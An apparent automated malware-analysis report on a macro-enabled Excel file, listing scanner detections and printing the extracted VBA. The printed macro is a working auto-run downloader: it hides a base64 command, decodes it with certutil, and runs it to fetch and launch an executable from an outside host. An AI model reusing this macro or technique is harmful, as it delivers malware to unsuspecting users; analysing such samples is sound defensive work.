MALICIOUS
364
Risk Score
Heuristics 9
-
ClamAV: Doc.Downloader.Generic-6698421-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Generic-6698421-0
-
VBA project inside OOXML medium 7 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell (command1) -
LOLBin reference in VBA critical OLE_VBA_LOLBINLOLBin reference in VBAMatched line in script
decodeFile = "cmd /c certutil -decode %temp%/8888888.txt %temp%/8888888.vbs && dir" -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
start1 = "cmd /c echo " -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open() -
Auto_Open macro low OLE_VBA_AUTOAuto_Open macroMatched line in script
Sub Auto_Open()
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1503 bytes |
SHA-256: 0c53105d2c1d127f95e7d903a1a19f6ed709a119bf25511c91116ae322ffc09e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Auto_Open()
Call writeFile1
End Sub
Sub writeFile1()
string1 = "RElNIG9ialNoZWxsICAKc2V0IG9ialNoZWxsID0gd3NjcmlwdC5jcmVhdGVPYmplY3QoIndzY3J"
string2 = "pcHQuc2hlbGwiKSAKaVJldHVybiA9IG9ialNoZWxsLlJ1bigiY21kIC9jIGVjaG8gd2dldCAtVX"
string3 = "JpICBodHRwczovL3d3dy5yZWpldHRvLmNvbS9oZnMvaGZzLmV4ZSAtT3V0RmlsZSAldGVtcCUvd"
string4 = "i5leGUgfCBwb3dlcnNoZWxsIC0gJiYgJXRlbXAlL3YuZXhlICIsIDAsIFRSVUUpICA="
status1 = string1 & string2 & string3 & string4
start1 = "cmd /c echo "
end1 = " > %temp%/8888888.txt"
command1 = start1 & status1 & end1
Shell (command1)
decodeFile = "cmd /c certutil -decode %temp%/8888888.txt %temp%/8888888.vbs && dir"
command2 = decodeFile & executeFile
Shell (command2)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 17920 bytes |
SHA-256: c88989478bcd61986e087126b4564d3cf0e3a097518699827bffd58cfebdd54f |
|||
|
Detection
ClamAV:
Doc.Downloader.Generic-6698421-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.